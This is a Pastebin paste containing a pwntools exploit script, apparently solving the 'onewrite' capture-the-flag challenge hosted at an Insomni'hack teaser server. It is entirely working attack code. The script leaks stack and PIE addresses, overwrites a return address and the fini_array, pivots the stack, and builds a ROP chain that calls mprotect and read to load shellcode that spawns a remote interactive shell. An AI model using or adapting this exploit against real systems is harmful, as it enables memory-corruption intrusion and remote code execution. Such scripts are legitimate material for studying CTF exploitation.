Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- from heaputils import *
- def write(addr,content):
- p.recvuntil("address : ")
- p.send(str(addr).ljust(0xF,"\x00"))
- p.recvuntil("data : ")
- p.send(p64(content))
- def exploit():
- p.recvuntil(">")
- p.sendline("1")
- STACK = int(p.recvline(),16)
- retaddr_location = 0x7fffd95e7108 - 0x7fffd95e70f0 + STACK
- log.info("STACK: 0x%x"%STACK)
- log.info("retaddr is at: 0x%x"%retaddr_location)
- #partial overwrite
- p.recvuntil("address : ")
- p.send(str(retaddr_location).ljust(0xF,"\x00"))
- p.recvuntil("data : ")
- p.send(chr(0x4))
- #PIE leak
- p.recvuntil(">")
- p.sendline("2")
- do_leak = int(p.recvline(),16)
- PIE = do_leak + 0x7fedc4b54000 - 0x7fedc4b5ca15
- log.info("PIE: 0x%x"%PIE)
- call_rsi = PIE + 0x1c763
- pop_rdi = PIE + 0x84FA
- pop_rsi = PIE + 0xD9F2
- pop_rdx = PIE + 0x484C5
- read = PIE + 0x460F0
- mprotect = PIE + 0x47070
- do_overwrite = PIE + 0x89C3
- fini_list = PIE + 0x2ADFB0
- libc_csu_fini = PIE + 0x9810
- # 0x00000000000563d9 : add rsp, 0x148 ; ret
- pivot_gadget= PIE + 0x563d9
- p.recvuntil("address : ")
- p.send(str(retaddr_location).ljust(0xF,"\x00"))
- p.recvuntil("data : ")
- p.send(p64(do_overwrite))
- write(fini_list+8,do_overwrite)
- write(fini_list,libc_csu_fini)
- # form a ROP chain: mprotect / shellcode
- ropstack = PIE + 0x2B4858
- ropstack_stager = STACK - 0x7ffc89d8d120 + 0x7ffc89d8cfa0 + 0x148
- retaddr_location = STACK - 0x7ffeaeb3c660 + 0x7ffeaeb3c4d8
- log.info("ROP Stack Stager: 0x%x"%ropstack_stager)
- write(ropstack_stager,pop_rdi)
- write(ropstack_stager+8,0)
- write(ropstack_stager+0x10,pop_rsi)
- write(ropstack_stager+0x18,ropstack_stager+0x38)
- write(ropstack_stager+0x20,pop_rdx)
- write(ropstack_stager+0x28,0x1000)
- write(ropstack_stager+0x30,read)
- write(retaddr_location,pivot_gadget)
- ropchain = p64(pop_rdi)+p64(PIE)
- ropchain += p64(pop_rsi)+p64(0x1000)
- ropchain += p64(pop_rdx)+p64(7)
- ropchain += p64(mprotect)
- ropchain += p64(pop_rdi)+p64(0)
- ropchain += p64(pop_rsi)+p64(PIE)
- ropchain += p64(pop_rdx)+p64(0x1000)
- ropchain += p64(read)
- ropchain += p64(PIE)
- shellcode_d = shellcraft.amd64.linux.sh()
- shellcode = asm(shellcode_d)
- p.send(ropchain)
- sleep(1) #wait for pipe to end
- p.send(shellcode)
- p.interactive()
- if __name__ == "__main__":
- context.os = 'linux'
- context.arch = 'amd64'
- e = ELF("./attackme")
- p = remote("onewrite.teaser.insomnihack.ch", 1337)
- exploit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement